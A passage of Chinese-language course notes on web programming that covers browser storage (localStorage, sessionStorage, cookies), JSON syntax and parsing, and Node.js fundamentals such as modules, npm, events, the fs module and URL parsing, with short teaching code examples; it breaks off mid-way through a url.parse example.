客户端存储web应用允许使用浏览器提供的API实现将数据存储在用户电脑上。
客户端存储遵循"同源策略",因此不同站点的页面是无法读取对于存储的数据。而同一站点的不同的页面之间是可以互相共享存储数据的。
web应用可以选择他们存储数据的有效期:有临时存储的,可以让数据保存至当前窗口关闭或浏览器退出;也有永久存储,可以将数据永久地存储在硬盘上,数年或者数月不失效。
客户端存储有以下几种形式:
• web存储
先是HTML5的一个API,后来成了标准了。目前包含IE8在内的主流浏览器都实现了。包含localStorage和sessionStorage对象,这两个对象实际上是持久化的关联数组,是名值对的映射表,“名”和“值”都是字符串。web存储易于使用,支持大容量(但非无限量)数据存储,同时兼容当前所有主流浏览器。
• cookie
cookie是一种早期的客户端存储机制,起初是针对服务器端脚本设计使用的。尽管在客户端提供了非常繁琐的javascript API来操作cookie,但它们难用至极,而且只适合少量的文本存储。不仅如此,任何以cookie形式存储的数据,不论服务器端是否需要,每一次HTTP请求都要把这些数据传输到服务器端。cookie目前仍然被大量的客户端程序员使用的一个重要的原因是:所有新旧浏览器都支持它。但是,随着Web Storage的普及,cookie将最终回归到最初的形态:作为一种被服务端脚本使用的客户存储机制。
Web存储
实现了“web存储”草案标准的浏览器在window对象上定义了两个属性,localStorage和sessionStorage。在控制台输入window.localStorage可以获得页面所存储的数据。
这两个属性代表同一个Storage对象(一个持久化关联数组),数组使用字符串来索引,存储的值也是字符串形式的,Storage对象在使用上和一般的Javascript没有什么两样,设置对象的属性为字符串值,随后浏览器会将值存储起来。lcoalStorage和sessionStorage两者的区别在于存储的有效期和作用域不同:即数据可以存储多长时间以及谁拥有数据的访问权。
通过localStorage存储的数据是永久性的,除非web应用立刻删除存储的数据。或者用户通过设置浏览器配置来删除,否则数据将一直保留在用户电脑上,永不过期
localStorage的作用域是限定在文档源(document origin)级别的。文档源是通过协议、主机名及端口三者来确定的。因此,每个url都有不同的文档源。
sessionStorage的有效期与存储数据的脚本所在最顶层的窗口或者是浏览器标签页是一样的。一旦窗口或者标签页被永久关闭了,那么所有通过sessionStorage存储的数据也被删除了。
sessionStorage的作用域也是限定在文档源中,因此,非同源的文档之间是无法贡献sessionStorage的。不仅如此,sessionStorage的作用域还被限定在窗口中。如果同源的文档渲染在不同的浏览器标签页中,那么他们互相之间拥有的是各自的sessionStorage数据,无法共享。就是说,同个浏览器下两个相同的标签页也不能共享数据。
Chap3-71.html
<p>中文姓名:<input type="text" id="txtC"> </p><p>英文姓名:<input type="text" id="txtE"> </p>
<button id="btn1">Web存储-localStorage</button><button id="btn2">Web存储-sessionStorage</button>
$(document).ready(function(){
var nameC=localStorage.uNameC; //等同于nameC=localStorage["unameC"]
if(!nameC){
$("#txtC").val("请输入用户名");
}else{
$("#txtC").val(localStorage.uNameC);
}
var nameE=sessionStorage.uNameE;
if(!nameE){
$("#txtE").val("Please input your name");
}else{
$("#txtE").val(sessionStorage.uNameE);
}
$("#btn1").click(function(){
localStorage.uNameC=$("#txtC").val();
});
$("#btn2").click(function(){
sessionStorage.uNameE=$("#txtE").val();
});
});
localStorage和sessionStorage通常是被当做普通的javascript对象使用。通过设置属性来存储字符串值,查询该属性来读取该值。这两个对象还提供了一些属性和方法:
属性或方法 语法 说明
length Storage.length 返回存储在Storage对象里的数据项数量。
setItem() storage.setItem(keyName, keyValue); 接受一个键名和值作为参数,将会把键名添加到存储中,如果键名已存在,则更新其对应的值。
getItem() storage.getItem(keyName); 接受一个键名作为参数,并返回对应键名的值。
removeItem() storage.removeItem(keyName); 接受一个键名作为参数,会把该键名从存储中移除。
clear() storage.clear(); 调用它可以清空存储对象里所有的键值。
key() storage.key(key); 接受一个数值n作为参数,返回存储对象第n个数据项的键名。
Chap3-71.html
<div id="results" style="font-size: x-large"></div>
$(document).ready(function(){
localStorage.setItem('bgcolor', 'red');
localStorage.setItem('font', 'Helvetica');
localStorage.setItem('image', 'myCat.png');
$("#results").html("删除前Storage中数据项:<br>");
for(var i=0;i<localStorage.length;i++){
$("#results").html(function (n,v) {
return v+localStorage.key(i)+": "+localStorage.getItem(localStorage.key(i))+"<br>";
});
}
localStorage.removeItem("image");
$("#results").html(function (n,v) {
return v+"删除后Storage中数据项:<br>";
});
for(var i=0;i<localStorage.length;i++){
$("#results").html(function (n,v) {
return v+localStorage.key(i)+": "+localStorage.getItem(localStorage.key(i))+"<br>";
});
}
});
$(document).ready(function(){
localStorage.setItem('bgcolor', 'red');
localStorage.setItem('font', 'Helvetica');
localStorage.setItem('image', 'myCat.png');
$("#results").html("删除前Storage中数据项:<br>");
for(var i=0;i<localStorage.length;i++){
$("#results").html(function (n,v) {
return v+localStorage.key(i)+": "+localStorage.getItem(localStorage.key(i))+"<br>";
});
}
localStorage.removeItem("image");
$("#results").html(function (n,v) {
return v+"删除后Storage中数据项:<br>";
});
for(var i=0;i<localStorage.length;i++){
$("#results").html(function (n,v) {
return v+localStorage.key(i)+": "+localStorage.getItem(localStorage.key(i))+"<br>";
});
}
});
cookie
cookie是指web浏览器存储的少量数据,同时它是与具体的web页面或者站点相关的。cookie最早是设计为被服务端所用的,cookie数据会自动在web浏览器和web服务器之间传输,因此服务端脚本就可以读、写客户端的cookie值。
可以通过document.cookie来获取cookie值。详见3.2.1.3。
JSON
什么是JSON?
JSON 指的是 JavaScript 对象表示法(JavaScript Object Notation)。
JSON 是轻量级的文本数据交换格式。
JSON 使用JavaScript语法来描述数据对象,但是JSON仍然独立于语言和平台。JSON解析器和JSON库支持许多不同的编程语言。
JSON 具有自我描述性,更易理解。
JSON文件
JSON文件的文件类型是.json
JSON文本的 MIME 类型是application/json
JSON 语法规则
JSON 语法是 JavaScript 对象表示法语法的子集。
• 数据在名称/值对中。
• 数据由逗号分隔
• 花括号保存对象。
• 方括号保存数组。
{
"employees": [
{ "firstName":"Bill" , "lastName":"Gates" },
{ "firstName":"George" , "lastName":"Bush" },
{ "firstName":"Thomas" , "lastName":"Carter" }
]
}
可以像这样访问 JavaScript 对象数组中的第一项:employees[0].lastName;
可以像这样修改数据:employees[0].lastName = "Jobs";
JSON 值可以是
• 数字(整数或浮点数)
• 字符串(在双引号中)
• 逻辑值(true 或 false)
• 数组(在方括号中)
• 对象(在花括号中)
• null
Chap3-72.html
<h2>在 JavaScript 中创建 JSON 对象</h2>
<p style="font-size: x-large">
Name: <span id="jname"></span><br />
Age: <span id="jage"></span><br />
Address: <span id="jstreet"></span><br />
Phone: <span id="jphone"></span><br />
</p>
<script type="text/javascript">
var JSONObject= {
"name":"Bill Gates",
"street":"Fifth Avenue New York 666",
"age":56,
"phone":"555 1234567"};
document.getElementById("jname").innerHTML=JSONObject.name;
document.getElementById("jage").innerHTML=JSONObject.age;
document.getElementById("jstreet").innerHTML=JSONObject.street;
document.getElementById("jphone").innerHTML=JSONObject.phone;
</script>
JSON的用法
JSON 最常见的用法之一,是从web服务器上读取JSON数据(作为文件或作为 HttpRequest),将JSON数据转换为JavaScript对象,然后在网页中使用该数据。
JavaScript 函数eval()可用于将JSON文本转换为JavaScript对象。必须把文本包围在括号中,这样才能避免语法错误:
var obj = eval ("(" + txt + ")");
提示eval()函数可编译并执行任何JavaScript代码。这隐藏了一个潜在的安全问题。
使用JSON解析器将JSON转换为JavaScript对象是更安全的做法。JSON解析器只能识别JSON文本,而不会编译脚本。
JSON对象和JSON字符串的转换
• JSON.parse(jsonString):在一个字符串中解析出JSON对象
• jQuery.parseJSON(jsonString):将格式完好的JSON字符串转为与之对应的JavaScript对象
• JSON.stringify(obj):将一个JSON对象转换成字符串
JSON.parse()jQuery.parseJSON()的区别:有的浏览器不支持JSON.parse()方法,使用jQuery.parseJSON()方法时,在浏览器支持时会返回执行JSON.parse()方法的结果,否则会返回类似执行eval()方法的结果。
Chap3-73.html
<h2>通过 JSON 字符串来创建对象</h3>
<p style="font-size: x-large">
First Name: <span id="fname1"></span><br />
Last Name: <span id="lname1"></span><br />
First Name: <span id="fname2"></span><br />
Last Name: <span id="lname2"></span><br />
</p>
<script type="text/javascript">
var txt = '{"employees":[' +
'{"firstName":"Bill","lastName":"Gates" },' +
'{"firstName":"George","lastName":"Bush" },' +
'{"firstName":"Thomas","lastName":"Carter" }]}';
var obj = eval ("(" + txt + ")");
document.getElementById("fname1").innerHTML=obj.employees[1].firstName;
document.getElementById("lname1").innerHTML=obj.employees[1].lastName;
var obj1 = JSON.parse(txt);
document.getElementById("fname2").innerHTML=obj1.employees[2].firstName;
document.getElementById("lname2").innerHTML=obj1.employees[2].lastName;
</script>
Node
• Node概述
• Node核心模块
• Express框架
Node概述
Node,或者Node.js,是一个可以让JavaScript运行在服务器端的平台。因此,可以用Node.js轻松地进行服务器端应用开发,在服务端堪与PHP、Python、Perl、Ruby平起平坐。
使用 Node.js,你可以轻松地开发:
• 具有复杂逻辑的网站;
• 基于社交网络的大规模Web应用;
• Web Socket服务器;
• TCP/UDP套接字应用程序;
• 命令行工具;
• 交互式终端程序;
• 带有图形用户界面的本地应用程序;
• 单元测试工具;
• 客户端JavaScript编译器。
当你使用Node.js时,不用额外搭建一个 HTTP 服务器,因为Node.js本身就内建了一个。这个服务器不仅可以用来调试代码,而且它本身就可以部署到产品环境,它的性能足以满足要求。
Node.js最大的特点就是采用异步式I/O与事件驱动的架构设计。Node.js在执行的过程中会维护一个事件队列,程序在执行时进入事件循环等待下一个事件到来,每个异步式I/O请求完成后会被推送到事件队列,等待程序进程进行处理。
例如,对于简单而常见的数据库查询操作,按照传统方式实现的代码如下:
res = db.query('SELECT * from some_table');
res.output();
以上代码在执行到第一行的时候,线程会阻塞,等待数据库返回查询结果,然后再继续处理。
对于高并发的访问,一方面线程长期阻塞等待,另一方面为了应付新请求而不断增加线程,因此会浪费大量系统资源,同时线程的增多也会占用大量的CPU时间来处理内存上下文切换,而且还容易遭受低速连接攻击。
看看Node.js是如何解决这个问题的:
db.query('SELECT * from some_table', function(res) {
res.output();
});
//后面的语句
这段代码中db.query的第二个参数是一个函数,我们称为回调函数。进程在执行到db.query的时候,不会等待结果返回,而是直接继续执行后面的语句,直到进入事件循环。当数据库查询结果返回时,会将事件发送到事件队列,等到线程进入事件循环以后,才会调用之前的回调函数继续执行后面的逻辑。
Node.js的异步机制是基于事件的,所有的磁盘I/O、网络通信、数据库查询都以非阻塞的方式请求,返回的结果由事件循环来处理。
Node.js进程在同一时刻只会处理一个事件,完成后立即进入事件循环检查并处理后面的事件。这样做的好处是,CPU和内存在同一时间集中处理一件事,同时尽可能让耗时的I/O操作并行执行。对于低速连接攻击,Node.js只是在事件队列中增加请求,等待操作系统的回应,因而不会有任何多线程开销,很大程度上可以提高Web应用的健壮性,防止恶意攻击。
Node事件
Chap4-1-1.js(异步读取文件)
var fs=require('fs'); //内置文件系统模块fs
console.log("异步读取文件");
fs.readFile('files/content.txt','utf-8',function (err,data) {
if(err){
console.error(err);
}else {
console.log(data);
}
});
console.log('end.');
Chap4-1-2.js(同步读取文件)
var fs=require('fs'); //内置文件系统模块fs
console.log("同步读取文件");
var data=fs.readFileSync('chap3.js','utf-8');
console.log(data);
console.log("end");
安装
https://nodejs.org/en/网站上下载Node 8.11.1 LTS,按步骤安装即可。
为了测试是否已经安装成功,我们在运行中输入cmd,打开命令提示符,然后输入node,将会进入Node.js的交互模式。
Node安装
通过这种方式安装的 Node.js 还自动附带了npm,我们可以在命令提示符中直接输入npm来使用它。
Node包管理器(npm)是一个由Node.js官方提供的第三方包管理工具,通过Node.js执行,能解决Node.js代码部署上的很多问题,常见的使用场景有以下几种:
• 允许用户从NPM服务器下载别人编写的第三方包到本地使用。
• 允许用户从NPM服务器下载并安装别人编写的命令行程序到本地使用。
• 允许用户将自己编写的包或命令行程序上传到NPM服务器供别人使用。
可以通过输入npm -v来测试是否成功安装。
npm
建立HTTP服务器
Node.js是为网络而诞生的平台,不同于“浏览器-HTTP 服务器-PHP 解释器”的组织方式,Node.js将“HTTP服务器”这一层抽离,直接面向浏览器用户。
Node与PHP的架构
Chap4-2.js
var http=require('http'); //http模块可以创建服务器应用实例,也能发送http请求
http.createServer(function (req,res) {
res.writeHead(200,{"Content-Type":"text/html"});
res.write("<h1>Node.js</h1>");
res.end("<p style='font-size: x-large'>Hello World</p>");
}).listen(3000);
console.log("HTTP server is listening at port 3000.");
模块与包
模块(Module)和包(Package)是Node.js最重要的支柱。开发一个具有一定规模的程序不可能只用一个文件,通常需要把各个功能拆分、封装,然后组合起来,模块正是为了实现这种方式而诞生的。
Node.js提供了require函数来调用其他模块,而且模块都是基于文件的,机制十分简单。
我们经常把 Node.js 的模块和包相提并论,因为模块和包是没有本质区别的,两个概念也时常混用。如果要辨析,那么可以把包理解成是实现了某个功能模块的集合,用于发布和维护。
创建模块
在 Node.js中,创建一个模块非常简单,因为一个文件就是一个模块,我们要关注的问题仅仅在于如何在其他文件中获取这个模块。
Node.js 提供了exportsrequire两个对象,其中exports是模块公开的接口,require用于从外部获取一个模块的接口,即所获取模块的exports对象。
module.js
通过exports对象把setNamesayHello作为模块的访问接口。
var name;
exports.setName=function (theName) {
name=theName;
};
exports.sayHello=function () {
return "hello "+name;
};
Chap4-3.js
在chap4-3.js中通过require('./module')加载这个模块,然后就可以直接访问module.js中exports对象的成员函数了。
var http=require('http'); //http模块可以创建服务器应用实例,也能发送http请求
var mymodule=require("./module");
mymodule.setName("Zhang San");
http.createServer(function (req,res) {
res.writeHead(200,{"Content-Type":"text/html"});
res.write("<h1>Node.js</h1>");
res.end("<p style='font-size: x-large'>"+mymodule.sayHello()+"</p>");
}).listen(3000);
console.log("HTTP server is listening at port 3000.");
npm提供的上万个模块都是通过这种简单的方式搭建起来的。
创建包
包是在模块基础上更深一步的抽象,它将某个独立的功能封装起来,用于发布、更新、依赖管理和版本控制。Node.js根据CommonJS规范实现了包机制,开发了npm来解决包的发布和获取需求。
Node.js的包是一个目录,其中包含一个 JSON 格式的包说明文件package.json。严格符合 CommonJS规范的包应该具备以下特征:
• package.json必须在包的顶层目录下;
• 二进制文件应该在bin目录下;
• JavaScript代码应该在lib目录下;
• 文档应该在doc目录下;
• 单元测试应该在test目录下。
Node.js对包的要求并没有这么严格,只要顶层目录下有package.json,并符合一些规范即可。
作为文件夹的模块
模块与文件是一一对应的。文件不仅可以是 JavaScript 代码或二进制代码,还可以是一个文件夹。最简单的包,就是一个作为文件夹的模块。
例如:建立一个叫做somepackage的文件夹,在其中创建index.js:
exports.hello=function () {console.log("hello.");};
然后在somepackage之外建立Chap4-4.js:
Chap4-4.js
var somePackage=require("./somepackage");
somePackage.hello();
我们使用这种方法可以把文件夹封装为一个模块,即所谓的。包通常是一些模块的集合,在模块的基础上提供了更高层的抽象,相当于提供了一些固定接口的函数库。
package.json
通过定制package.json,我们可以创建更复杂、更完善、更符合规范的包用于发布。在前面例子中的somepackage文件夹下,我们创建一个叫做package.json的文件,内容如下所示:
{"main":"./lib/interface.js"}
然后将index.js重命名为interface.js并放入lib子文件夹下。以同样的方式再次调用这个包,依然可以正常使用。
Node.js在调用某个包时,会首先检查包中package.json文件的main字段,将其作为包的接口模块,如果package.json或main字段不存在,会尝试寻找index.js或index.node作为包的接口。
package.json是CommonJS规定的用来描述包的文件,完全符合规范的package.json文件应该含有以下字段:
• name:包的名称,必须是唯一的,由小写英文字母、数字和下划线组成,不能包含空格。
• description:包的简要说明。
• version:符合语义化版本识别规范的版本字符串。
• keywords:关键字数组,通常用于搜索。
• maintainers:维护者数组,每个元素要包含 nameemail (可选)、web (可选)字段。
• contributors:贡献者数组,格式与maintainers相同。包的作者应该是贡献者数组的第一个元素。
• bugs:提交bug的地址,可以是网址或者电子邮件地址。
• licenses:许可证数组,每个元素要包含 type (许可证的名称)和 url (链接到许可证文本的地址)字段。
• main:入口文件,如果不存在这个字段,会自动按下面顺序查找:index.jsindex.nodeindex.json
• dependencies:当前包所需的依赖包,一个关联数组,由包名称和版本号组成。
• repositories:源代码的托管仓库位置,每个元素要包含 type (仓库的类型,如 git )、url (仓库的地址)和 path (相对于仓库的路径,可选)字段。
Node.js包管理器
npm是 Node.js 官方提供的包管理工具,它已经成了 Node.js 包的标准发布平台,用于 Node.js 包的发布、传播、依赖控制。npm 提供了命令行工具,使你可以方便地下载、安装、升级、删除包,也可以让你作为开发者发布并维护包。
获取一个包
使用 npm 安装包的命令格式为:npm [install/i] [package_name]
npm在默认情况下会从http://npmjs.org搜索或下载包,将包安装到当前目录的node_modules子目录下。
本地模式和全局模式
在使用npm安装包的时候,有两种模式:本地模式和全局模式。默认情况下我们使用npm install命令就是采用本地模式,即把包安装到当前目录的node_modules子目录下。Node.js的require在加载模块时会尝试搜寻node_modules子目录,因此使用 npm 本地模式安装的包可以直接被引用。
npm 还有另一种不同的安装模式被成为全局模式,使用方法为:npm [install/i] -g [package_name]
当使用全局模式安装时,npm会将包安装到系统目录,譬如:C:\Users\admin\node_modules。
注意:使用全局模式安装的包并不能直接在JavaScript文件中用require获得,因为require不会搜索 /User/admin/node_modules。
总而言之,当我们要把某个包作为工程运行时的一部分时,通过本地模式获取,如果要在命令行下使用,则使用全局模式安装。
Node核心模块
• 全局对象
• 常用工具
• 事件机制
• 文件系统访问
• URL &querystring模块
• HTTP服务器与客户端
全局对象
Node.js 中的全局对象是global,所有全局变量(除了global本身以外)都是global对象的属性,例如consoleexportsprocess等。
process对象
process对象是一个全局变量,它提供当前Node.js进程的有关信息,以及控制当前Node.js进程。 因为是全局变量,所以无需使用require()
• process.argv属性返回一个数组,这个数组包含了启动Node.js进程时的命令行参数。第一个元素为node,第二个元素为当前执行的JavaScript文件路径。剩余的元素为其他命令行参数。
Chap4-5.js
process.argv.forEach(function(val,index){
console.log(index+":"+val);
});
运行以下命令,启动进程:
node chap4-5.js one two=three four
• process.stdout是标准输出流,通常我们使用的console.log()向标准输出打印字符,而process.stdout.write()函数提供了更底层的接口。
• process.stdin是标准输入流。
Chap4-5.js
var num1, num2;
process.stdout.write('请输入num1的值:');//向屏幕输出,提示信息,要求输入num1
/*监听用户的输入*/
process.stdin.on('data', function (chunk) {
if (!num1) {
num1 = Number(chunk);
process.stdout.write('请输入num2的值');//向屏幕输出,提示信息,要求输入num2
} else {
num2 = Number(chunk);
process.stdout.write('结果是:' + (num1 + num2));
}
});
console对象
用于向标准输出流(stdout)或标准错误流(stderr)输出字符。
• console.log():向标准输出流打印字符并以换行符结束,其可以接受若干个参数。
const count = 5;
console.log('count: %d', count);
• console.error():与console.log()用法相同,只是向标准错误流输出。
console.error('error #%d', count);
__dirname属性
返回当前模块的文件夹名称。等同于__filenamepath.dirname()的值。
console.log(__dirname); //返回D:\教学\讲义\网络技术与应用\programming\myNode\chap4
__filename属性
返回当前模块的文件名称。
console.log(__filename); //返回D:\教学\讲义\网络技术与应用\programming\myNode\chap4\chap4-6.js
require()方法
引入模块:
• 引入同目录下的包(根据文件夹名称)
注意:包名称前面需要加./
Chap4-3.js
var http=require('http'); //http模块可以创建服务器应用实例,也能发送http请求
var mymodule=require("./module");
mymodule.setName("Zhang San");
http.createServer(function (req,res) {
res.writeHead(200,{"Content-Type":"text/html"});
res.write("<h1>Node.js</h1>");
res.end("<p style='font-size: x-large'>"+mymodule.sayHello()+"</p>");
}).listen(3000);
console.log("HTTP server is listening at port 3000.");
• 引入同目录下node_modules目录下的包
包的路径:\myNode\node\_modules\somepackage\index.js
Chap4-7.js的路径:\myNode\chap4-7.js
Chap4-7.js
var somePackage=require("somepackage");
somePackage.hello();
常用工具util
util模块,提供常用函数的集合,用于弥补核心JavaScript的功能过于精简的不足。 它可以通过以下方式使用:var util = require('util');
util.inherits(constructor, superConstructor)
从一个构造函数中继承原型方法到另一个。constructor的原型会被设置到一个从superConstructor创建的新对象上。
Chap4-8.js
var util=require("util");
function Base() {
this.name="base";
this.base=1991;
this.sayHello=function () {
console.log("hello "+this.name);
};
}
Base.prototype.showName=function () {
console.log(this.name);
};
function Sub() {
this.name="sub";
}
util.inherits(Sub,Base);
var objBase=new Base();
objBase.showName();
objBase.sayHello();
console.log(objBase);
var objSub=new Sub();
objSub.showName();
console.log(objSub);
输出结果:
base
hello base
Base { name: 'base', base: 1991, sayHello: [Function] }
sub
Sub { name: 'sub' }
util.inspect(object[, options])
返回object的字符串表示,主要用于调试。
options可用于改变格式化字符串的某些方面:
• showHidden,如果为true,则object的不可枚举的符号与属性也会被包括在格式化后的结果中。默认为false
• depth表示最大递归的层数,如果对象很复杂,你可以指定层数以控制输出信息的多少。如果不指定depth,默认会递归2层,指定为null表示将不限递归层数完整遍历对象。
• color值为true,输出格式将会以ANSI颜色编码,通常用于在终端显示更漂亮的效果。
Chap4-9.js
var util=require("util");
function Person() {
this.name="byvoid";
this.toString=function () {
return this.name;
};
}
var obj=new Person();
console.log(util.inspect(obj));
console.log(util.inspect(obj,true));
输出结果:
Person { name: 'byvoid', toString: [Function] }
Person {
name: 'byvoid',
toString:
{ [Function]
[length]: 0,
[name]: '',
[arguments]: null,
[caller]: null,
[prototype]: { [constructor]: [Circular] } } }
事件机制
events是Node.js最重要的模块,没有“之一”,原因是Node.js本身架构就是事件式的,而它提供了唯一的接口,所以堪称Node.js事件编程的基石。events模块不仅用于用户代码与Node.js下层事件循环的交互,还几乎被所有的模块依赖。
events模块只提供了一个对象: events.EventEmitterEventEmitter的核心就是事件发射与事件监听器功能的封装。
EventEmitter的每个事件由一个事件名和若干个参数组成,事件名是一个字符串,通常表达一定的语义。对于每个事件,EventEmitter支持若干个事件监听器。当事件发射时,注册到这个事件的事件监听器被依次调用,事件参数作为回调函数参数传递。
Chap4-10.js
var events=require("events");
var emitter=new events.EventEmitter();
emitter.on("someEvent",function (arg1,arg2) {
console.log("Listener1",arg1,arg2);
});
emitter.on("someEvent",function (arg1,arg2) {
console.log("Listener2",arg1,arg2);
});
emitter.emit("someEvent","byvoid",1991);
输出结果:
Listener1 byvoid 1991
Listener2 byvoid 1991
EventEmitter对象的方法 说明
addListener(event, listener) 为指定事件添加一个监听器到监听器数组的尾部
on(event, listener) 为指定事件注册一个监听器,接受一个字符串event和一个回调函数
once(event, listener) 为指定事件注册一个单次监听器,即 监听器最多只会触发一次,触发后立刻解除该监听器
removeListener(event, listener) 移除指定事件的某个监听器,监听器必须是该事件已经注册过的监听器。它接受两个参数,第一个是事件名称,第二个是回调函数名称
removeAllListeners([event]) 移除所有事件的所有监听器, 如果指定事件,则移除指定事件的所有监听器
setMaxListeners(n) 默认情况下, EventEmitters如果你添加的监听器超过 10 个就会输出警告信息。setMaxListeners函数用于提高监听器的默认限制的数量
listeners(event) 返回指定事件的监听器数组
emit(event, [arg1], [arg2], [...]) 按参数的顺序执行每个监听器,如果事件有注册监听返回true,否则返回false
EventEmitter类方法 说明
listenerCount(emitter, event) 返回指定事件的监听器数量。
Chap4-10.js
var events = require('events');
var eventEmitter = new events.EventEmitter();
var listener1 = function listener1() {console.log('监听器 listener1 执行。');} // 监听器 #1
var listener2 = function listener2() {console.log('监听器 listener2 执行。');} // 监听器 #2
var listener3 = function listener3() {console.log('监听器 listener3 执行。');} // 监听器 #3
// 绑定 connection 事件,处理函数为 listener1
eventEmitter.addListener('connection', listener1 );
// 绑定 connection 事件,处理函数为 listener2
eventEmitter.on('connection', listener2 );
// 绑定 connection 事件,处理函数为 listener3
eventEmitter.once('connection', listener3 );
var eventListeners = require('events').EventEmitter.listenerCount(eventEmitter,'connection');
console.log(eventListeners + " 个监听器监听连接事件。");
// 处理 connection 事件
eventEmitter.emit('connection');
// 移除监绑定的 listener1 函数
eventEmitter.removeListener('connection', listener1 );
console.log("listener1 不再受监听。");
// 触发连接事件
eventEmitter.emit('connection');
eventListeners = require('events').EventEmitter.listenerCount(eventEmitter,'connection');
console.log(eventListeners + " 个监听器监听连接事件。");
console.log("程序执行完毕。");
文件系统访问
fs模块是文件操作的封装,它提供了文件的读取、写入、更名、删除、遍历目录、链接等文件系统操作。
Node导入文件系统模块(fs)语法如下所示:var fs = require("fs")
fs.readFile(filename[, encoding][, callback(err,data)])
filename,表示要读取的文件名;
encoding,是可选的,表示文件的字符编码;
callback,是回调函数,用于接收文件的内容。回调函数提供两个参数errdataerr表示有没有错误发生,data是文件内容。如果指定了encodingdata是一个解析后的字符串,否则data将会是以Buffer形式表示的二进制数据。
Chap4-11.js
var fs=require('fs'); //内置文件系统模块fs
fs.readFile('files/content.txt','utf-8',function (err,data) {
if(err){
console.error(err);
}else {
console.log("utf-8");
console.log(data);
}
});
fs.readFile('files/content.txt',function (err,data) {
if(err){
console.error(err);
}else {
console.log("缺省encoding");
console.log(data);
}
});
输出结果:
utf-8
Text 文本文件实例
缺省encoding
<Buffer 54 65 78 74 20 e6 96 87 e6 9c ac e6 96 87 e4 bb b6 e5 ae 9e e4 be 8b>
fs.readFileSync(filename, [encoding])
fs.readFile同步的版本。
它接受的参数和fs.readFile相同,而读取到的文件内容会以函数返回值的形式返回。如果有错误发生,fs将会抛出异常,你需要使用trycatch捕捉并处理异常。
Chap4-1-2.js
var fs=require('fs'); //内置文件系统模块fs
console.log("同步读取文件");
var data=fs.readFileSync('chap3.js','utf-8');
console.log(data);
console.log("end");
fs.open(path, flags, [mode], [callback(err, fd)])
异步地打开文件。
path为文件的路径;
flags可以是以下值:
• r:以读取模式打开文件。
• r+:以读写模式打开文件。
• w:以写入模式打开文件,如果文件不存在则创建。
• w+:以读写模式打开文件,如果文件不存在则创建。
• a:以追加模式打开文件,如果文件不存在则创建。
• a+:以读取追加模式打开文件,如果文件不存在则创建。
mode参数用于创建文件时给文件指定权限。但只有当文件被创建时才有效。默认为0666,可读写。
fd为一个整数,表示打开文件返回的文件描述符。
fs.read(fd, buffer, offset, length, position, [callback(err, bytesRead, buffer)])
功能是从指定的文件描述符fd中读取数据并写入buffer指向的缓冲区对象。
offsetbuffer的写入偏移量;
length是要从文件中读取的字节数;
position是文件读取的起始位置,如果position的值为null,则会从当前文件指针的位置读取;
回调函数传递bytesRead和`buffer,分别表示读取的字节数和缓冲区对象。
fs.close(fd, [callback(err)])
为异步模式下关闭文件。
Chap4-12.js
一般来说,除非必要,否则不要使用这种方式读取文件,因为它要求你手动管理缓冲区和文件指针,尤其是在你不知道文件大小的时候,这将会是一件很麻烦的事情。
var fs=require("fs");
fs.open("files/content.txt","r",function (err,fd) {
if(err){
console.error(err);
return;
}
var buf=new Buffer(8);
fs.read(fd,buf,0,8,null,function (err,bytesRead,buffer) {
if(err){
console.error(err);
return;
}
console.log("bytesRead:"+bytesRead);
console.log(buffer);
})
fs.close(fd,function (err) {
if(err){
return console.error(err);
}
});
});
输出结果:
bytesRead:8
<Buffer 54 65 78 74 20 e6 96 87>
fs.writeFile(file, data[, encoding][, callback(err)])
功能是异步地写入数据到文件,如果文件已经存在,则替代文件;
file,文件名或文件描述符;
data可以是一个字符串或一个buffer
Chap4-13.js
var fs=require("fs");
console.log("准备写入文件");
fs.writeFile("files/input.txt","我是通过fs.writeFile写入文件的内容","utf8",function (err) {
if(err){
return console.error(err);
}
console.log("数据写入成功!");
})
fs.write(fd,buffer,offset,length,position,[callback(err, bytesWritten, buffer)])
功能是写入bufferfd指定的文件;
offsetbuffer中被写入偏移量;
length指定要写入的字节数;
position指向从文件开始写入数据的位置,如果position的值为null,则会从当前文件指针的位置写入;
回调函数传递bytesWrittenbuffer,分别表示写入的字节数和缓冲区对象。
在Node.js中,定义了一个Buffer类,该类用来创建一个专门存放二进制数据的缓存区。
Chap4-14.js
var fs=require("fs");
fs.open("files/index2.txt","w",function (err,fd) {
if(err){
return console.error(err);
}
var buffer=new Buffer("Hello World!");
fs.write(fd,buffer,0,12,null,function (err,bytesWritten,buffer) {
if(err){
return console.error(err);
}
console.log(bytesWritten,buffer.slice(0,bytesWritten).toString());
fs.close(fd);
})
});
url & querystring模块
url模块
url模块提供了一些实用函数,用于 url处理与解析,url字符串是一个结构化的字符串,包含多个有意义的组成部分,被解析时,会返回一个URL对象,包含每个组成部分的属性。
url模块的方法有三个:
url.parse(urlStr[, parseQueryString][, slashesDenoteHost])
将url字符串转换成object对象
urlStr:需要处理的url字符串;
parseQueryString:是否将查询参数也解析成对象。为true时将使用查询模块分析查询字符串,默认为false
slashesDenoteHost:解析主机处理,双斜线表示主机。
• 默认为false//foo/bar形式的字符串将被解释成{ pathname: '//foo/bar' }
• 如果设置成true//foo/bar形式的字符串将被解释成{ host: 'foo', pathname: '/bar' }
url字符串组成
var url=require('url');
var url1='http://calc.gongjuji.net/byte/?name=zhangsan&age=18#one#two';
console.log(url.parse(url1));
// { protocol: 'http:', //使用协议
// slashes: null, //
// auth: null, // 验证信息
// host: 'calc.gongjuji.net', //全小写的主机部分的URL,包括端口信息。
// port: null, //端口
// hostname: 'calc.gongjuji.net',//小写的主机部分的主机
// hash: '#one#two', //页面锚点参数部分
// search: '?name=zhangsan&age=18',//查询参数部分,带?
// query: 'name=zhangsan&age=18', //查询参数部分
// pathname: '/byte/', //目录部分
// path: '/byte/?name=zhangsan&age=18',//目录+参数部分
// href: 'http://calc.gongjuji.net/byte/?name=zhangsan&age=18#one#two' //最初解析的完整的网址。双方的协议和主机是小写。
// }
var url2='//www.gongjuji.net/byte/?name=zhangsan#one';
console.log(url.parse(url2,true,true));
// { protocol: null,
// slashes: true,
// auth: null,
// host: 'www.gongjuji.net',
// port: null,
// hostname: 'www.gongjuji.net',
// hash: '#one',
// search: '?name=zhangsan',
// query: { name: 'zhangsan' },
// pathname: '/byte/',
// path: '/byte/?name=zhangsan',
// href: '//www.gongjuji.net/byte/?name=zhangsan#one' }
var url=require('url');
var url2='//www.gongjuji.net/byte/?name=zhangsan#one';
console.log(url.parse(url2,true));
// { protocol: null,
// slashes: null,
// auth: null,
// host: null,
// port: null,
// hostname: null,
// hash: '#one',
// search: '?name=zhangsan',
// query: { name: 'zhangsan' },
// pathname: '//www.gongjuji.net/byte/',
